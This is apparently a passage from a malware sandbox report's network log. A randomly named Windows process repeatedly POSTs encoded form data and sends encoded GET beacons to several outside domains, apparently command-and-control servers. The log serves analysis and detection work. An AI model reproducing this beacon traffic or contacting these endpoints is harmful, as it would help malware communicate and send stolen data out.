                                                            Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                            Jul 3, 2024 17:38:14.226742029 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                            Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                            Jul 3, 2024 17:38:14.226844072 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                            Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                            Jul 3, 2024 17:38:14.226856947 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                            Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                            Jul 3, 2024 17:38:14.408354998 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                            Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            26 | 192.168.11.20 | 49800 | 203.161.50.127 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:16.781913042 CEST | 1119 | OUT | POST /pci0/ HTTP/1.1
                                                            Host: www.spotluv.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.spotluv.xyz
                                                            Referer: http://www.spotluv.xyz/pci0/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:16.967883110 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:16 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            27 | 192.168.11.20 | 49801 | 203.161.50.127 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:19.538357019 CEST | 3867 | OUT | POST /pci0/ HTTP/1.1
                                                            Host: www.spotluv.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.spotluv.xyz
                                                            Referer: http://www.spotluv.xyz/pci0/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:20.098349094 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:19 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            28 | 192.168.11.20 | 49802 | 203.161.50.127 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:22.262573957 CEST | 519 | OUT | GET /pci0/?_B7=LxyxWrj8kri0gh&vX=eSBSxWzRVUHV/fBDA1gktKapDAjXHwIYGqgWiDMm1TKOgAQN0YKNcvcCpBWCJxpF3POgg0Ef/1qs6yZQX/5+pidIDj1j3gicnpT8MY0pZ20V89EBh37W5PY= HTTP/1.1
                                                            Host: www.spotluv.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:22.447380066 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:22 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            29 | 192.168.11.20 | 49803 | 172.67.146.224 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:27.957123995 CEST | 791 | OUT | POST /ieqg/ HTTP/1.1
                                                            Host: www.olhadeputat.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.olhadeputat.com
                                                            Referer: http://www.olhadeputat.com/ieqg/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:28.196312904 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:28 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Powered-By: ASP.NET
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D1KfYUODC9rRl6oCVbOiEn1Atas4taJDBfsZofnl3UtmUkX%2BOwItBL%2BE76nNUUAhQbRYxewhwV%2BXKcUw%2BV6Ki85DEBAA1TnKZArLh4pmhQWZXkTcAO2WRvSWipnUgql6V4kb%2Btvi"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f6751bd389ec-ORD
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            30 | 192.168.11.20 | 49804 | 172.67.146.224 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:30.629728079 CEST | 1131 | OUT | POST /ieqg/ HTTP/1.1
                                                            Host: www.olhadeputat.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.olhadeputat.com
                                                            Referer: http://www.olhadeputat.com/ieqg/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:30.869544029 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:30 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Powered-By: ASP.NET
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p1jK54NQaEt9%2Bv7Nh1F4OqbZfDMN03EodjRGAd5%2BLfRUGpKR9Mvq8Inu5Vb6ltXgHIK5wOiiktP6CR7wXdQnSSl1gKXy2cLwt1PXmywpTc9wf9LanB37zR6aeOBFnpQIjgL6qUkq"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f685c9e8114d-ORD
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            31 | 192.168.11.20 | 49805 | 172.67.146.224 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:33.302954912 CEST | 5156 | OUT | POST /ieqg/ HTTP/1.1
                                                            Host: www.olhadeputat.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.olhadeputat.com
                                                            Referer: http://www.olhadeputat.com/ieqg/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:33.806667089 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:33 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Powered-By: ASP.NET
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=af3yOc4FsGEsXja9rF3cTz%2Bz0sDDk6LAUq7u1aqqzadAb1mg4Nh4IFGrVkbRovh13cJjFeul137wPcXslkVRRWKQA0a7tsQkusFJc%2B3wERR2tI%2BqQn89EScdZ0bZV47rPpKZUo3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f6967c1861bb-ORD
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            32 | 192.168.11.20 | 49806 | 172.67.146.224 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:35.975142002 CEST | 523 | OUT | GET /ieqg/?vX=xOYzP3dXeV68t5l1tdRGSaa1OFHMEwYl9QyrCyFOBp5kwxTuFOJ28A7LPoPnjOnXE6vKLrR6BAa5LOtmMQtvuaXLo91Bunju73veWhfgD7rjWCO2fFDcACU=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.olhadeputat.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:36.214675903 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:36 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Powered-By: ASP.NET
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqKTcn9iGMHyHMMA3WPH6z2vazS6V8iwTQZTLDlA6l05ZPCJUi%2BR3ZtfgHtDA4YrtNBqlJzzRC7EMqINVOhUSLacE49X8B3XPnbj4BfHYW2%2BcKsXBue3dVqFDhyXtZX%2FEha9yDR5"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f6a73d6be17c-ORD
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana
                                                            Jul 3, 2024 17:38:36.214689970 CEST | 554 | IN |
                                                            Data Ascii: , sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header">
                                                            Jul 3, 2024 17:38:36.214701891 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            33 | 192.168.11.20 | 49807 | 44.227.65.245 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:41.597037077 CEST | 794 | OUT | POST /ouk5/ HTTP/1.1
                                                            Host: www.voupeclients.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.voupeclients.com
                                                            Referer: http://www.voupeclients.com/ouk5/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Ascii: vX=CJ+1SUuM4PPMaY5F8ItSVu6NmT3s58Zv9jiVFZhaquKd6KMGghT2pE+WNEQ0GvUOAJ1y3ophE1B/ODj/r/k7J8AmlS21ZjWrRBJ5cBI8L/GWwBYgayUXAGvnlBNjQE7KY2+Lck6gGuQ+aA2/fp4IArNyx5jMmJz3qCoZCjaKQzTYUUtUB8t2sqrbnYJieb25rA==
                                                            Jul 3, 2024 17:38:41.779546022 CEST | 385 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:38:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: http://voupeclients.com
                                                            X-Frame-Options: sameorigin
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            34 | 192.168.11.20 | 49808 | 44.227.65.245 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:44.325926065 CEST | 1134 | OUT | POST /ouk5/ HTTP/1.1
                                                            Host: www.voupeclients.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.voupeclients.com
                                                            Referer: http://www.voupeclients.com/ouk5/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Ascii: vX=CJ+1SUuM4PPMa4pF6vBSdu6Moz3sssZj9jmVFcZKq7ad6r8GywT2lk+WHkQ7bfUFAJxM3oVhE19/PyD/tPk4GcBUiS20TDWhRA1tcD08IOqWzA0gNWAUKGvh1xNgak7+Y2i5clCaGdM+ZhW/ep4PS7N5z5izhbOipwhuOUm2KWDZRlV5EulJsoDqobUea5bK0BkdJ5+rWBQFf/8sxcxnVeIjfH6kSua5I2iiDGeSLljuuCHyEQZLvS6g9kkGsISwvWw9R7Jb4JuiBAqQX1lqPydl8mLcPFWp7zvjuSMWKRBS2+C06Qtj9YZRvr82XbPS1S+XLN30UYKakAHH109n5mCuhD3aPzpSJVu061OZI+A2QpBl//VWBRz3KmtqABUxWOUc+P7c41ZjxDHejtg7XyvKab6D9CijJEVWg48W/ap15U/O3iNW7Y8laRKg7ltdfTWF/BWcgkW/ELfVYT14Etjj7/XVYZBSebDoXaVxSLAC3Sz2HiYmjUTJyw5m6c8hYIaH67T9PAAhoT/qSyQIVE8=
                                                            Jul 3, 2024 17:38:44.508347034 CEST | 385 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:38:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: http://voupeclients.com
                                                            X-Frame-Options: sameorigin
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            35 | 192.168.11.20 | 49809 | 44.227.65.245 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:47.061451912 CEST | 2578 | OUT | POST /ouk5/ HTTP/1.1
                                                            Host: www.voupeclients.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.voupeclients.com
                                                            Referer: http://www.voupeclients.com/ouk5/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:47.243540049 CEST | 385 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:38:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: http://voupeclients.com
                                                            X-Frame-Options: sameorigin
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            36 | 192.168.11.20 | 49810 | 44.227.65.245 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:49.790857077 CEST | 524 | OUT | GET /ouk5/?vX=PLWVRijYnvzxBPZV68lDWez5n1m4qNxygDOUEJJl7paGkoFy8irkxF+ePmZFSckDR+ltzcYQPDsLLRino9E0Pe5jqCKxYTXxZRA6KSseMdymxDABailrF38=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.voupeclients.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:49.972012997 CEST | 385 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:38:49 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: http://voupeclients.com
                                                            X-Frame-Options: sameorigin
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            37 | 192.168.11.20 | 49811 | 3.33.130.190 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:55.322060108 CEST | 812 | OUT | POST /fzbg/ HTTP/1.1
                                                            Host: www.fundraiserstuffies.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.fundraiserstuffies.com
                                                            Referer: http://www.fundraiserstuffies.com/fzbg/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Ascii: vX=jRwSaizXRCVEyFMrDykB/qHH6UsC+0l0gThK5zQ57+9zrL/kak9GpPaRwczzUlxD7WYeOTznI+E0SUUuc1DlKARKLb2jqNRggskaLc+1DPNiheqDx9/SLnwz2DaCYlORcJnMfOEcvYNBl0BH3XrNjvCpzXz2Pq/b0Br0bDk4/vki+2y6JF73a12kh4u+My8x/g==


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            38 | 192.168.11.20 | 49812 | 3.33.130.190 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:58.004158974 CEST | 1152 | OUT | POST /fzbg/ HTTP/1.1
                                                            Host: www.fundraiserstuffies.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.fundraiserstuffies.com
                                                            Referer: http://www.fundraiserstuffies.com/fzbg/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            39 | 192.168.11.20 | 49813 | 3.33.130.190 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:39:00.686530113 CEST | 2578 | OUT | POST /fzbg/ HTTP/1.1
                                                            Host: www.fundraiserstuffies.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.fundraiserstuffies.com
                                                            Referer: http://www.fundraiserstuffies.com/fzbg/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            40 | 192.168.11.20 | 49814 | 3.33.130.190 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:39:03.353831053 CEST | 530 | OUT | GET /fzbg/?vX=uTYyZSOtPBVL0hIsKgpi95HQtVEr7RxE1GtfhiQgzt00yp3pQHZ/yduqmfXPDQ0x8hM1I2y7MNxQRHVIE3PkPDlbAMuSsvV/gP9PT/eZTJpyk9nI4JynE2g=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.fundraiserstuffies.com
